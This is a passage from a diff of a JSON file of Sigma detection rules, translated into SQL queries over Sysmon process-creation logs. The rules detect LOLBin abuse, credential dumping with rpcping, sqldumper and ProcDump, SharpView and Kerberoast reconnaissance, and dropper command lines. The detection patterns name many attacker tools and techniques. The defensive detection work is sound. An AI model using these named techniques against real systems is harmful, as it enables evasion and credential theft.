'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE 
'%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE 
'\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", - "status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, 
oscd.community", - "tags": [ - "attack.execution", - "attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "status": "experimental", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Capture Credentials with Rpcping.exe", + "id": "93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", + "status": "test", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" 
+ "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_attrib_hiding_files.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1047", - "attack.t1220", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "title": "Dumping Process via Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.defense_evasion", "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate MSSQL Server actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run Once Task Execution as Configured in Registry", + "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "status": "test", + "description": "This rule detects the execution of Run Once task as configured in the registry", + "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_runonce_execution.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "author": "frack113", "tags": [ - "attack.defense_evasion", - 
"attack.t1218.010" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR 
CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR 
CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detect use of the 
Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + "Legitimate uses of logon scripts distributed via group policy" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE 